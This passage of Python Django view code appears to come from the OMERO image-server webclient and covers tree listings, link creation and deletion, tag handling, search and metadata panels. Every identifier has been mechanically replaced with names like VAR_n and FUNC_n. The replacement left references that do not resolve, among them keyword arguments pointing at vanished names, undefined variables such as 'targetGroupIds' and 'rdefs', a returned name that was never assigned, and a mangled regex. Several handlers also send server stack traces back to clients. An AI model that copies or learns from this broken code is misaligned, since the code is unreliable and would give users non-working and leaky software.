VAR_20=group_id,
VAR_11=experimenter_id,
VAR_87=page,
VAR_88=limit,
)
VAR_71["plates"] = tree.marshal_plates(
VAR_6=conn,
VAR_247=True,
VAR_20=group_id,
VAR_11=experimenter_id,
VAR_87=page,
VAR_88=limit,
)
try:
VAR_344 = VAR_2.session["server_settings"]["ui"]["tree"]["orphans"]
except Exception:
VAR_344 = {"enabled": True}
if (
VAR_6.isAdmin()
or VAR_6.isLeader(VAR_337=VAR_2.session.get("active_group"))
or VAR_11 == VAR_6.getUserId()
or VAR_344.get("enabled", True)
):
VAR_247 = tree.marshal_orphaned(
VAR_6=conn,
VAR_20=group_id,
VAR_11=experimenter_id,
VAR_87=page,
VAR_88=limit,
)
VAR_247["name"] = VAR_344.get("name", "Orphaned Images")
VAR_71["orphaned"] = VAR_247
except ApiUsageException as e:
return HttpResponseBadRequest(e.serverStackTrace)
except ServerError as e:
return HttpResponseServerError(e.serverStackTrace)
except IceException as e:
return HttpResponseServerError(e.message)
return JsonResponse(VAR_71)
@login_required()
def FUNC_17(VAR_2, VAR_6=None, **VAR_7):
try:
VAR_87 = FUNC_0(VAR_2, "page", 1)
VAR_88 = FUNC_0(VAR_2, "limit", settings.PAGE)
VAR_20 = FUNC_0(VAR_2, "group", -1)
VAR_245 = FUNC_0(VAR_2, "id", None)
except ValueError:
return HttpResponseBadRequest("Invalid parameter value")
if not VAR_6.isValidGroup(VAR_20):
return HttpResponseForbidden("Not a member of Group: %s" % VAR_20)
try:
VAR_107 = tree.marshal_datasets(
VAR_6=conn, VAR_245=project_id, VAR_20=group_id, VAR_87=page, VAR_88=limit
)
except ApiUsageException as e:
return HttpResponseBadRequest(e.serverStackTrace)
except ServerError as e:
return HttpResponseServerError(e.serverStackTrace)
except IceException as e:
return HttpResponseServerError(e.message)
return JsonResponse({"datasets": VAR_107})
@login_required()
def FUNC_18(VAR_2, VAR_6=None, **VAR_7):
try:
VAR_87 = FUNC_0(VAR_2, "page", 1)
VAR_88 = FUNC_0(VAR_2, "limit", settings.PAGE)
VAR_20 = FUNC_0(VAR_2, "group", -1)
VAR_246 = FUNC_0(VAR_2, "id", None)
VAR_247 = FUNC_3(VAR_2, "orphaned", False)
VAR_248 = FUNC_3(VAR_2, "sizeXYZ", False)
VAR_249 = FUNC_3(VAR_2, "thumbVersion", False)
VAR_250 = FUNC_3(VAR_2, "date", False)
VAR_11 = FUNC_0(VAR_2, "experimenter_id", -1)
except ValueError:
return HttpResponseBadRequest("Invalid parameter value")
if not VAR_6.isValidGroup(VAR_20):
return HttpResponseForbidden("Not a member of Group: %s" % VAR_20)
VAR_25 = "share_id" in VAR_7 and VAR_241(VAR_7["share_id"]) or None
try:
VAR_106 = tree.marshal_images(
VAR_6=conn,
VAR_247=orphaned,
VAR_11=experimenter_id,
VAR_246=dataset_id,
VAR_25=share_id,
VAR_248=load_pixels,
VAR_20=group_id,
VAR_87=page,
VAR_250=date,
VAR_249=thumb_version,
VAR_88=limit,
)
except ApiUsageException as e:
return HttpResponseBadRequest(e.serverStackTrace)
except ServerError as e:
return HttpResponseServerError(e.serverStackTrace)
except IceException as e:
return HttpResponseServerError(e.message)
return JsonResponse({"images": VAR_106})
@login_required()
def FUNC_19(VAR_2, VAR_6=None, **VAR_7):
try:
VAR_87 = FUNC_0(VAR_2, "page", 1)
VAR_88 = FUNC_0(VAR_2, "limit", settings.PAGE)
VAR_20 = FUNC_0(VAR_2, "group", -1)
VAR_251 = FUNC_0(VAR_2, "id", None)
except ValueError:
return HttpResponseBadRequest("Invalid parameter value")
if not VAR_6.isValidGroup(VAR_20):
return HttpResponseForbidden("Not a member of Group: %s" % VAR_20)
try:
VAR_110 = tree.marshal_plates(
VAR_6=conn, VAR_251=screen_id, VAR_20=group_id, VAR_87=page, VAR_88=limit
)
except ApiUsageException as e:
return HttpResponseBadRequest(e.serverStackTrace)
except ServerError as e:
return HttpResponseServerError(e.serverStackTrace)
except IceException as e:
return HttpResponseServerError(e.message)
return JsonResponse({"plates": VAR_110})
@login_required()
def FUNC_20(VAR_2, VAR_6=None, **VAR_7):
try:
VAR_87 = FUNC_0(VAR_2, "page", 1)
VAR_88 = FUNC_0(VAR_2, "limit", settings.PAGE)
VAR_252 = FUNC_0(VAR_2, "id", None)
except ValueError:
return HttpResponseBadRequest("Invalid parameter value")
if VAR_252 is None:
return HttpResponseBadRequest("id (VAR_421) must be specified")
try:
VAR_253 = tree.marshal_plate_acquisitions(
VAR_6=conn, VAR_252=plate_id, VAR_87=page, VAR_88=limit
)
except ApiUsageException as e:
return HttpResponseBadRequest(e.serverStackTrace)
except ServerError as e:
return HttpResponseServerError(e.serverStackTrace)
except IceException as e:
return HttpResponseServerError(e.message)
return JsonResponse({"acquisitions": VAR_253})
def FUNC_21(VAR_6, VAR_12, VAR_13, VAR_14, VAR_15):
if VAR_12 == "orphaned":
return None
VAR_72 = None
if VAR_12 == "experimenter":
if VAR_14 in ["dataset", "plate", "tag"]:
return None
elif VAR_12 == "project":
if VAR_14 == "dataset":
VAR_72 = "ProjectDatasetLink"
elif VAR_12 == "dataset":
if VAR_14 == "image":
VAR_72 = "DatasetImageLink"
elif VAR_12 == "screen":
if VAR_14 == "plate":
VAR_72 = "ScreenPlateLink"
elif VAR_12 == "tagset":
if VAR_14 == "tag":
VAR_72 = "AnnotationAnnotationLink"
if not VAR_72:
raise Http404("json VAR_158 needs 'parent_type' and 'child_type'")
VAR_73 = omero.sys.ParametersI()
VAR_73.addIds(VAR_15)
VAR_74 = VAR_6.getQueryService()
VAR_75 = (
"""
from %s olink join fetch olink.child join fetch olink.parent
where olink.child.id in (:VAR_187)
"""
% VAR_72
)
if VAR_13:
VAR_73.add("pid", rlong(VAR_13))
VAR_75 += " and olink.parent.id = :pid"
VAR_76 = VAR_74.findAllByQuery(VAR_75, VAR_73, VAR_6.SERVICE_OPTS)
if VAR_13 is not None and len(VAR_76) == 0:
raise Http404(
"No VAR_346 found for %s-%s to %s-%s"
% (VAR_12, VAR_13, VAR_14, VAR_15)
)
return VAR_72, VAR_76
def FUNC_22(VAR_12, VAR_13, VAR_14, VAR_16):
if VAR_12 == "experimenter":
if VAR_14 == "dataset" or VAR_14 == "plate":
return "orphan"
if VAR_12 == "project":
VAR_254 = ProjectI(VAR_241(VAR_13), False)
if VAR_14 == "dataset":
VAR_345 = DatasetI(VAR_241(VAR_16), False)
VAR_346 = ProjectDatasetLinkI()
VAR_346.setParent(VAR_254)
VAR_346.setChild(VAR_345)
return VAR_346
elif VAR_12 == "dataset":
VAR_345 = DatasetI(VAR_241(VAR_13), False)
if VAR_14 == "image":
VAR_142 = ImageI(VAR_241(VAR_16), False)
VAR_346 = DatasetImageLinkI()
VAR_346.setParent(VAR_345)
VAR_346.setChild(VAR_142)
return VAR_346
elif VAR_12 == "screen":
VAR_384 = ScreenI(VAR_241(VAR_13), False)
if VAR_14 == "plate":
VAR_421 = PlateI(VAR_241(VAR_16), False)
VAR_346 = ScreenPlateLinkI()
VAR_346.setParent(VAR_384)
VAR_346.setChild(VAR_421)
return VAR_346
elif VAR_12 == "tagset":
if VAR_14 == "tag":
VAR_346 = AnnotationAnnotationLinkI()
VAR_346.setParent(TagAnnotationI(VAR_241(VAR_13), False))
VAR_346.setChild(TagAnnotationI(VAR_241(VAR_16), False))
return VAR_346
return None
def FUNC_23(VAR_6, VAR_14, VAR_15):
if VAR_14 == "tag":
VAR_14 = "Annotation"
VAR_77 = {}
for VAR_38 in VAR_6.getObjects(VAR_14, VAR_15):
VAR_77[VAR_38.id] = VAR_38.details.owner.id.val
return VAR_77
@login_required()
def FUNC_24(VAR_2, VAR_6=None, **VAR_7):
if VAR_2.method not in ["POST", "DELETE"]:
return JsonResponse(
{"Error": "Need to POST or DELETE JSON VAR_158 to VAR_230 links"}, VAR_315=405
)
try:
VAR_17 = json.loads(VAR_2.body)
except TypeError:
VAR_17 = json.loads(bytes_to_native_str(VAR_2.body))
if VAR_2.method == "POST":
return FUNC_25(VAR_6, VAR_17)
elif VAR_2.method == "DELETE":
return FUNC_26(VAR_6, VAR_17)
def FUNC_25(VAR_6, VAR_17, **VAR_7):
VAR_78 = {"success": False}
VAR_79 = []
VAR_80 = "WriteOwned" in VAR_6.getCurrentAdminPrivileges()
VAR_66 = VAR_6.getUserId()
for VAR_12, VAR_82 in VAR_17.items():
if VAR_12 in ("orphaned", "experimenter"):
continue
for VAR_13, children in VAR_82.items():
for VAR_14, VAR_15 in children.items():
VAR_385 = FUNC_23(VAR_6, VAR_14, VAR_15)
for VAR_16 in VAR_15:
VAR_13 = int(VAR_13)
VAR_346 = FUNC_22(VAR_12, VAR_13, VAR_14, VAR_16)
if VAR_346 and VAR_346 != "orphan":
if VAR_80 and VAR_385[VAR_16] != VAR_66:
VAR_346.details.owner = ExperimenterI(
VAR_385[VAR_16], False
)
VAR_79.append(VAR_346)
if len(VAR_79) > 0:
VAR_255 = VAR_12.title()
if VAR_255 in ["Tagset", "Tag"]:
VAR_255 = "TagAnnotation"
try:
VAR_272 = VAR_6.getQueryService().get(VAR_255, VAR_13, VAR_6.SERVICE_OPTS)
VAR_6.SERVICE_OPTS.setOmeroGroup(VAR_272.details.group.id.val)
except omero.ValidationException:
return JsonResponse(
{"error": "Object of type %s and ID %s not found" % (VAR_255, VAR_13)},
VAR_315=404,
)
VAR_0.info("api_link: Saving %s links" % len(VAR_79))
try:
VAR_6.saveArray(VAR_79)
VAR_78["success"] = True
except Exception:
VAR_0.info(
"api_link: Exception on saveArray with %s links" % len(VAR_79)
)
for VAR_346 in VAR_79:
try:
VAR_6.saveObject(VAR_346)
except Exception:
pass
VAR_78["success"] = True
return JsonResponse(VAR_78)
def FUNC_26(VAR_6, VAR_17):
VAR_78 = {"success": False}
for VAR_12, VAR_82 in VAR_17.items():
if VAR_12 == "orphaned":
continue
for VAR_13, children in VAR_82.items():
for VAR_14, VAR_15 in children.items():
VAR_386 = FUNC_21(
VAR_6, VAR_12, VAR_13, VAR_14, VAR_15
)
if VAR_386 is None:
continue
VAR_387, VAR_240 = VAR_386
VAR_388 = [VAR_71.id.val for VAR_71 in VAR_240]
VAR_0.info("api_link: Deleting %s links" % len(VAR_388))
VAR_6.deleteObjects(VAR_387, VAR_388, wait=True)
VAR_387, VAR_389 = FUNC_21(
VAR_6, VAR_12, None, VAR_14, VAR_15
)
for rl in VAR_389:
VAR_361 = rl.parent.id.val
VAR_422 = rl.child.id.val
if VAR_361 == int(VAR_13):
continue
if VAR_12 not in VAR_78:
VAR_78[VAR_12] = {}
if VAR_361 not in VAR_78[VAR_12]:
VAR_78[VAR_12][VAR_361] = {VAR_14: []}
VAR_78[VAR_12][VAR_361][VAR_14].append(VAR_422)
VAR_78["success"] = True
return JsonResponse(VAR_78)
@login_required()
def FUNC_27(VAR_2, VAR_6=None, **VAR_7):
VAR_81 = {"image": "dataset", "dataset": "project", "plate": "screen"}
VAR_82 = []
for VAR_14, VAR_12 in VAR_81.items():
VAR_187 = VAR_2.GET.getlist(VAR_14)
if len(VAR_187) == 0:
continue
VAR_15 = []
for id in VAR_187:
for VAR_320 in id.split(","):
VAR_15.append(VAR_320)
VAR_72, VAR_223 = FUNC_21(
VAR_6, VAR_12, None, VAR_14, VAR_15
)
for VAR_346 in VAR_223:
VAR_82.append(
{
"id": VAR_346.id.val,
"parent": {"type": VAR_12, "id": VAR_346.parent.id.val},
"child": {"type": VAR_14, "id": VAR_346.child.id.val},
}
)
return JsonResponse({"data": VAR_82})
@login_required()
def FUNC_28(VAR_2, VAR_6=None, **VAR_7):
try:
VAR_11 = FUNC_0(VAR_2, "experimenter", None)
VAR_245 = FUNC_0(VAR_2, "project", None)
VAR_246 = FUNC_0(VAR_2, "dataset", None)
VAR_256 = FUNC_0(VAR_2, "image", None)
VAR_251 = FUNC_0(VAR_2, "screen", None)
VAR_252 = FUNC_0(VAR_2, "plate", None)
VAR_257 = FUNC_0(VAR_2, "run", None)
VAR_257 = FUNC_0(VAR_2, "acquisition", VAR_257)
VAR_258 = VAR_2.GET.get("well", None)
VAR_259 = FUNC_0(VAR_2, "tag", None)
VAR_260 = FUNC_0(VAR_2, "tagset", None)
VAR_261 = FUNC_0(VAR_2, "roi", None)
VAR_262 = FUNC_0(VAR_2, "shape", None)
VAR_20 = FUNC_0(VAR_2, "group", None)
VAR_263 = FUNC_0(VAR_2, "page_size", settings.PAGE)
except ValueError:
return HttpResponseBadRequest("Invalid parameter value")
if VAR_259 is not None or VAR_260 is not None:
VAR_264 = paths_to_tag(VAR_6, VAR_11, VAR_260, VAR_259)
else:
VAR_264 = paths_to_object(
VAR_6,
VAR_11,
VAR_245,
VAR_246,
VAR_256,
VAR_251,
VAR_252,
VAR_257,
VAR_258,
VAR_20,
VAR_263,
VAR_261,
VAR_262,
)
return JsonResponse({"paths": VAR_264})
@login_required()
def FUNC_29(VAR_2, VAR_6=None, **VAR_7):
if VAR_2.method == "GET":
return FUNC_30(VAR_2, VAR_6, **VAR_7)
elif VAR_2.method == "DELETE":
return FUNC_31(VAR_2, VAR_6, **VAR_7)
def FUNC_30(VAR_2, VAR_6=None, **VAR_7):
try:
VAR_87 = FUNC_0(VAR_2, "page", 1)
VAR_88 = FUNC_0(VAR_2, "limit", settings.PAGE)
VAR_20 = FUNC_0(VAR_2, "group", -1)
VAR_259 = FUNC_0(VAR_2, "id", None)
VAR_11 = FUNC_0(VAR_2, "experimenter_id", -1)
VAR_247 = FUNC_3(VAR_2, "orphaned", False)
VAR_248 = FUNC_3(VAR_2, "sizeXYZ", False)
VAR_250 = FUNC_3(VAR_2, "date", False)
except ValueError:
return HttpResponseBadRequest("Invalid parameter value")
try:
if VAR_259 is not None:
VAR_265 = tree.marshal_tagged(
VAR_6=conn,
VAR_11=experimenter_id,
VAR_259=tag_id,
VAR_20=group_id,
VAR_87=page,
VAR_248=load_pixels,
VAR_250=date,
VAR_88=limit,
)
else:
VAR_265 = {}
VAR_265["tags"] = tree.marshal_tags(
VAR_6=conn,
VAR_247=orphaned,
VAR_11=experimenter_id,
VAR_259=tag_id,
VAR_20=group_id,
VAR_87=page,
VAR_88=limit,
)
except ApiUsageException as e:
return HttpResponseBadRequest(e.serverStackTrace)
except ServerError as e:
return HttpResponseServerError(e.serverStackTrace)
except IceException as e:
return HttpResponseServerError(e.message)
return JsonResponse(VAR_265)
def FUNC_31(VAR_2, VAR_6=None, **VAR_7):
try:
VAR_266 = FUNC_2(VAR_2, "id")
except ValueError:
return HttpResponseBadRequest("Invalid parameter value")
VAR_83 = list()
VAR_84 = None
try:
for VAR_259 in VAR_266:
VAR_83.append(omero.cmd.Delete("/Annotation", VAR_259))
VAR_267 = omero.cmd.DoAll()
VAR_267.requests = VAR_83
VAR_84 = VAR_6.c.sf.submit(VAR_267, VAR_6.SERVICE_OPTS)
try:
VAR_6._waitOnCmd(VAR_84)
finally:
VAR_84.close()
except CmdError as e:
return HttpResponseBadRequest(e.message)
except ServerError as e:
return HttpResponseServerError(e.serverStackTrace)
except IceException as e:
return HttpResponseServerError(e.message)
return JsonResponse("")
@login_required()
def FUNC_32(VAR_2, VAR_6=None, **VAR_7):
VAR_71 = VAR_2.GET
VAR_46 = FUNC_1(VAR_2, "image")
VAR_45 = FUNC_1(VAR_2, "dataset")
VAR_44 = FUNC_1(VAR_2, "project")
VAR_47 = FUNC_1(VAR_2, "screen")
VAR_48 = FUNC_1(VAR_2, "plate")
VAR_85 = FUNC_1(VAR_2, "acquisition")
VAR_86 = FUNC_1(VAR_2, "well")
VAR_87 = FUNC_0(VAR_2, "page", 1)
VAR_88 = FUNC_0(VAR_2, "limit", VAR_1)
VAR_89 = VAR_71.get("type", None)
VAR_90 = VAR_71.get("ns", None)
VAR_91, VAR_92 = tree.marshal_annotations(
VAR_6,
VAR_44=project_ids,
VAR_45=dataset_ids,
VAR_46=image_ids,
VAR_47=screen_ids,
VAR_48=plate_ids,
VAR_85=run_ids,
VAR_86=well_ids,
VAR_89=ann_type,
VAR_90=ns,
VAR_87=page,
VAR_88=limit,
)
return JsonResponse({"annotations": VAR_91, "experimenters": VAR_92})
@login_required()
def FUNC_33(VAR_2, VAR_6=None, **VAR_7):
try:
VAR_87 = FUNC_0(VAR_2, "page", 1)
VAR_88 = FUNC_0(VAR_2, "limit", settings.PAGE)
VAR_244 = FUNC_0(VAR_2, "member_id", -1)
VAR_231 = FUNC_0(VAR_2, "owner_id", -1)
except ValueError:
return HttpResponseBadRequest("Invalid parameter value")
try:
VAR_112 = tree.marshal_shares(
VAR_6=conn, VAR_244=member_id, VAR_231=owner_id, VAR_87=page, VAR_88=limit
)
discussions = tree.marshal_discussions(
VAR_6=conn, VAR_244=member_id, VAR_231=owner_id, VAR_87=page, VAR_88=limit
)
except ApiUsageException as e:
return HttpResponseBadRequest(e.serverStackTrace)
except ServerError as e:
return HttpResponseServerError(e.serverStackTrace)
except IceException as e:
return HttpResponseServerError(e.message)
return JsonResponse({"shares": VAR_112, "discussions": VAR_268})
@login_required()
@render_response()
def FUNC_34(VAR_2, VAR_18=None, VAR_19=None, VAR_6=None, **VAR_7):
VAR_93 = getIntOrDefault(VAR_2, "index", 0)
VAR_94 = dict()
if VAR_18 is not None:
if VAR_19 is not None and int(VAR_19) > 0:
VAR_94[VAR_347(VAR_18)] = VAR_241(VAR_19)
try:
VAR_104 = BaseContainer(VAR_6, **VAR_94)
except AttributeError as x:
return handlerInternalError(VAR_2, x)
VAR_95 = None
VAR_53 = {"manager": VAR_104, "form_well_index": VAR_95, "index": VAR_93}
VAR_54 = None
if "plate" in VAR_94 or "acquisition" in VAR_94:
VAR_269 = VAR_104.getNumberOfFields()
if VAR_269 is not None:
VAR_95 = WellIndexForm(VAR_115={"index": VAR_93, "range": VAR_269})
if VAR_93 == 0:
VAR_93 = VAR_269[0]
VAR_59 = VAR_2.GET.get("show")
if VAR_59 is not None:
VAR_348 = []
for w in VAR_59.split("|"):
if "well-" in w:
VAR_348.append(w.replace("well-", ""))
VAR_53["select_wells"] = ",".join(VAR_348)
VAR_53["baseurl"] = VAR_352("webgateway").rstrip("/")
VAR_53["form_well_index"] = VAR_95
VAR_53["index"] = VAR_93
VAR_53["thumbnails_batch"] = settings.THUMBNAILS_BATCH
VAR_54 = "webclient/VAR_158/VAR_421.html"
if VAR_18 == "acquisition":
VAR_53["acquisition"] = VAR_19
VAR_53["isLeader"] = VAR_6.isLeader()
VAR_53["template"] = VAR_54
return VAR_53
@login_required()
@render_response()
def FUNC_35(VAR_2, VAR_6=None, **VAR_7):
VAR_96 = []
VAR_97 = set()
VAR_98 = []
VAR_68 = {}
VAR_77 = {}
for VAR_215 in ("Project", "Dataset", "Image", "Screen", "Plate"):
VAR_154 = VAR_2.GET.get(VAR_215, None)
if VAR_154 is not None:
for o in VAR_6.getObjects(VAR_215, VAR_154.split(",")):
VAR_96.append(o.getDetails().owner.id.val)
VAR_97.add(o.getDetails().group.id.val)
VAR_96 = list(set(VAR_96))
if len(VAR_96) == 0:
VAR_96 = [VAR_6.getUserId()]
for VAR_103 in VAR_6.getObjects(
"Experimenter", VAR_96, opts={"load_experimentergroups": True}
):
VAR_270 = []
VAR_77[VAR_103.id] = VAR_103.getFullName()
for VAR_101 in VAR_103.copyGroupExperimenterMap():
VAR_68[VAR_101.parent.id.val] = VAR_101.parent
VAR_270.append(VAR_101.parent.id.val)
VAR_98.append(set(VAR_270))
VAR_99 = set.intersection(*VAR_98)
VAR_100 = VAR_6.getAdminService().getSecurityRoles().userGroupId
if VAR_100 in VAR_99:
targetGroupIds.remove(VAR_100)
if len(VAR_97) == 1:
VAR_271 = VAR_97.pop()
if VAR_271 in VAR_99:
targetGroupIds.remove(VAR_271)
def FUNC_84(VAR_101):
VAR_272 = VAR_101.getDetails().permissions
return {
"write": VAR_272.isGroupWrite(),
"annotate": VAR_272.isGroupAnnotate(),
"read": VAR_272.isGroupRead(),
}
VAR_102 = []
for VAR_337 in VAR_99:
VAR_102.append(
{"id": VAR_337, "name": VAR_68[VAR_337].name.val, "perms": FUNC_84(VAR_68[VAR_337])}
)
VAR_102.sort(VAR_312=lambda x: x["name"])
VAR_77 = [[VAR_415, VAR_416] for VAR_415, VAR_416 in VAR_77.items()]
return {"owners": VAR_77, "groups": VAR_102}
@login_required()
@render_response()
def FUNC_36(VAR_2, VAR_20, VAR_21, VAR_6=None, **VAR_7):
VAR_6.SERVICE_OPTS.setOmeroGroup(int(VAR_20))
VAR_103 = getIntOrDefault(VAR_2, "owner", None)
VAR_104 = BaseContainer(VAR_6)
VAR_104.listContainerHierarchy(VAR_103)
VAR_54 = "webclient/VAR_158/chgrp_target_tree.html"
VAR_53 = {"manager": VAR_104, "target_type": VAR_21, "template": VAR_54}
return VAR_53
@login_required()
@render_response()
def FUNC_37(VAR_2, VAR_22=None, VAR_6=None, **VAR_7):
VAR_104 = BaseSearch(VAR_6)
VAR_105 = []
VAR_71 = VAR_2.GET
if VAR_22 is not None:
VAR_273 = VAR_71.get("query", None)
if VAR_273 is None:
return HttpResponse("No search '?query' included")
VAR_273 = query_search.replace("+", " ")
VAR_274 = toBoolean(VAR_71.get("advanced"))
if VAR_274:
VAR_273 = VAR_71.get("advanced_search")
VAR_54 = "webclient/search/search_details.html"
VAR_275 = VAR_71.getlist("datatype")
VAR_269 = VAR_71.getlist("field")
VAR_276 = VAR_71.get("searchGroup", None)
VAR_277 = VAR_71.get("ownedBy", None)
VAR_278 = toBoolean(VAR_71.get("useAcquisitionDate"))
VAR_279 = VAR_71.get("startdateinput", None)
VAR_279 = VAR_279 is not None and smart_str(VAR_279) or None
VAR_280 = VAR_71.get("enddateinput", None)
VAR_280 = VAR_280 is not None and smart_str(VAR_280) or None
VAR_250 = None
if VAR_279 is not None:
if VAR_280 is None:
VAR_390 = datetime.datetime.now()
VAR_280 = "%s-%02d-%02d" % (VAR_390.year, VAR_390.month, VAR_390.day)
VAR_250 = "%s_%s" % (VAR_279, VAR_280)
if len(VAR_275) == 0:
VAR_275 = ["images"]
VAR_104.search(
VAR_273,
VAR_275,
VAR_269,
VAR_276,
VAR_277,
VAR_278,
VAR_250,
rawQuery=VAR_274,
)
VAR_281 = re.compile(r"^[\VAR_364 ,]+$")
if VAR_281.search(VAR_273) is not None:
VAR_6.SERVICE_OPTS.setOmeroGroup(-1)
VAR_349 = set()
for queryId in re.split(" |,", VAR_273):
if len(queryId) == 0:
continue
try:
VAR_423 = VAR_241(queryId)
if VAR_423 in VAR_349:
continue
VAR_349.add(VAR_423)
for VAR_433 in VAR_275:
VAR_433 = VAR_433[0:-1] # remove 's'
if VAR_433 in (
"project",
"dataset",
"image",
"screen",
"plate",
"well",
):
VAR_38 = VAR_6.getObject(VAR_433, VAR_423)
if VAR_38 is not None:
VAR_105.append({"otype": VAR_433, "obj": VAR_38})
except ValueError:
pass
else:
VAR_54 = "webclient/search/search.html"
VAR_53 = {
"manager": VAR_104,
"foundById": VAR_105,
"resultCount": VAR_104.c_size + len(VAR_105),
}
VAR_53["template"] = VAR_54
VAR_53["thumbnails_batch"] = settings.THUMBNAILS_BATCH
return VAR_53
@login_required()
@render_response()
def FUNC_38(VAR_2, VAR_23, VAR_24, VAR_6=None, VAR_25=None, **VAR_7):
VAR_93 = getIntOrDefault(VAR_2, "index", 0)
VAR_53 = dict()
VAR_106 = VAR_23 == "image" and list(VAR_6.getObjects("Image", [VAR_24])) or list()
VAR_107 = (
VAR_23 == "dataset" and list(VAR_6.getObjects("Dataset", [VAR_24])) or list()
)
VAR_108 = (
VAR_23 == "project" and list(VAR_6.getObjects("Project", [VAR_24])) or list()
)
VAR_109 = VAR_23 == "screen" and list(VAR_6.getObjects("Screen", [VAR_24])) or list()
VAR_110 = VAR_23 == "plate" and list(VAR_6.getObjects("Plate", [VAR_24])) or list()
VAR_111 = (
VAR_23 == "acquisition"
and list(VAR_6.getObjects("PlateAcquisition", [VAR_24]))
or list()
)
VAR_112 = (
(VAR_23 == "share" or VAR_23 == "discussion")
and [VAR_6.getShare(VAR_24)]
or list()
)
VAR_113 = VAR_23 == "well" and list(VAR_6.getObjects("Well", [VAR_24])) or list()
VAR_114 = {
"images": VAR_23 == "image" and [VAR_24] or [],
"datasets": VAR_23 == "dataset" and [VAR_24] or [],
"projects": VAR_23 == "project" and [VAR_24] or [],
"screens": VAR_23 == "screen" and [VAR_24] or [],
"plates": VAR_23 == "plate" and [VAR_24] or [],
"acquisitions": VAR_23 == "acquisition" and [VAR_24] or [],
"wells": VAR_23 == "well" and [VAR_24] or [],
"shares": ((VAR_23 == "share" or VAR_23 == "discussion") and [VAR_24] or []),
}
VAR_115 = {
"selected": VAR_114,
"images": VAR_106,
"datasets": VAR_107,
"projects": VAR_108,
"screens": VAR_109,
"plates": VAR_110,
"acquisitions": VAR_111,
"wells": VAR_113,
"shares": VAR_112,
}
VAR_116 = None
VAR_117 = None
if VAR_23 in ("share", "discussion"):
VAR_54 = "webclient/annotations/annotations_share.html"
VAR_104 = BaseShare(VAR_6, VAR_24)
VAR_104.getAllUsers(VAR_24)
VAR_104.getComments(VAR_24)
VAR_116 = CommentAnnotationForm(VAR_115=initial)
else:
try:
VAR_104 = BaseContainer(VAR_6, **{VAR_347(VAR_23): VAR_241(VAR_24), "index": VAR_93})
except AttributeError as x:
return handlerInternalError(VAR_2, x)
if VAR_25 is not None:
VAR_54 = "webclient/annotations/annotations_share.html"
VAR_53["share"] = BaseShare(VAR_6, VAR_25)
else:
VAR_54 = "webclient/annotations/metadata_general.html"
VAR_53["canExportAsJpg"] = VAR_104.canExportAsJpg(VAR_2)
VAR_53["annotationCounts"] = VAR_104.getAnnotationCounts()
VAR_117 = VAR_104.listFigureScripts()
VAR_53["manager"] = VAR_104
if VAR_23 in ("tag", "tagset"):
VAR_53["insight_ns"] = omero.rtypes.rstring(
omero.constants.metadata.NSINSIGHTTAGSET
).val
if VAR_116 is not None:
VAR_53["form_comment"] = VAR_116
VAR_53["figScripts"] = VAR_117
VAR_53["template"] = VAR_54
VAR_53["webclient_path"] = VAR_352("webindex")
return VAR_53
@login_required()
@render_response()
def FUNC_39(VAR_2, VAR_23, VAR_24, VAR_6=None, VAR_25=None, **VAR_7):
VAR_53 = {}
VAR_93 = getIntOrDefault(VAR_2, "index", 0)
VAR_104 = BaseContainer(VAR_6, **{VAR_347(VAR_23): VAR_241(VAR_24)})
if VAR_25:
VAR_53["share"] = BaseShare(VAR_6, VAR_25)
if VAR_23 == "well":
VAR_104.image = VAR_104.well.getImage(VAR_93)
VAR_118 = VAR_104.image.getAllRenderingDefs()
VAR_119 = {}
VAR_120 = VAR_104.image.getRenderingDefId()
for VAR_71 in VAR_118:
VAR_229 = VAR_71["owner"]["id"]
VAR_71["current"] = VAR_71["id"] == VAR_120
if VAR_229 not in VAR_119 or VAR_119[VAR_229]["id"] < VAR_71["id"]:
VAR_119[VAR_229] = VAR_71
VAR_119 = rdefs.values()
VAR_121 = []
for VAR_71 in VAR_119:
VAR_282 = []
for VAR_320, VAR_383 in enumerate(VAR_71["c"]):
VAR_350 = "-"
if VAR_383["active"]:
VAR_350 = ""
VAR_351 = VAR_383["lut"] if "lut" in VAR_383 else VAR_383["color"]
VAR_352 = "r" if VAR_383["inverted"] else "-r"
VAR_282.append(
"%s%s|%s:%s%s$%s" % (VAR_350, VAR_320 + 1, VAR_383["start"], VAR_383["end"], VAR_352, VAR_351)
)
VAR_121.append(
{
"id": VAR_71["id"],
"owner": escape(VAR_71["owner"]), # May be used unsafe later
"c": ",".join(VAR_282),
"m": VAR_71["model"] == "greyscale" and "g" or "c",
}
)
VAR_122, VAR_123 = VAR_6.getMaxPlaneSize()
VAR_124 = VAR_104.image.getSizeX()
VAR_125 = VAR_104.image.getSizeY()
VAR_53["tiledImage"] = (VAR_124 * VAR_125) > (VAR_122 * VAR_123)
VAR_53["manager"] = VAR_104
VAR_53["rdefsJson"] = json.dumps(VAR_121)
VAR_53["rdefs"] = VAR_119
VAR_53["template"] = "webclient/annotations/metadata_preview.html"
return VAR_53
@login_required()
@render_response()
def FUNC_40(VAR_2, VAR_23, VAR_24, VAR_6=None, **VAR_7):
VAR_104 = BaseContainer(VAR_6, **{VAR_347(VAR_23): VAR_241(VAR_24)})
VAR_53 = {"manager": VAR_104}
VAR_53["template"] = "webclient/annotations/metadata_hierarchy.html"
return VAR_53
@login_required()
@render_response()
def FUNC_41(
VAR_2, VAR_23, VAR_24, VAR_6=None, VAR_25=None, **VAR_7
):
try:
if VAR_23 in ("share", "discussion"):
VAR_54 = "webclient/annotations/annotations_share.html"
VAR_104 = BaseShare(VAR_6, VAR_24)
VAR_104.getAllUsers(VAR_24)
VAR_104.getComments(VAR_24)
else:
VAR_54 = "webclient/annotations/metadata_acquisition.html"
VAR_104 = BaseContainer(VAR_6, **{VAR_347(VAR_23): VAR_241(VAR_24)})
except AttributeError as x:
return handlerInternalError(VAR_2, x)
VAR_126 = None
VAR_127 = None
VAR_128 = None
VAR_129 = list()
VAR_130 = None
VAR_131 = list()
VAR_132 = list()
VAR_133 = list()
VAR_134 = list()
VAR_135 = list()
VAR_136 = list(VAR_6.getEnumerationEntries("LaserType"))
VAR_137 = list(VAR_6.getEnumerationEntries("ArcType"))
VAR_138 = list(VAR_6.getEnumerationEntries("FilamentType"))
VAR_139 = None
VAR_140 = None
VAR_141 = None
if VAR_23 == "image":
if VAR_25 is None:
VAR_104.companionFiles()
VAR_104.channelMetadata()
for theC, ch in enumerate(VAR_104.channel_metadata):
VAR_353 = ch.getLogicalChannel()
if VAR_353 is not None:
VAR_391 = dict()
VAR_391["form"] = MetadataChannelForm(
VAR_115={
"logicalChannel": VAR_353,
"exWave": ch.getExcitationWave(units=True),
"emWave": ch.getEmissionWave(units=True),
"illuminations": list(
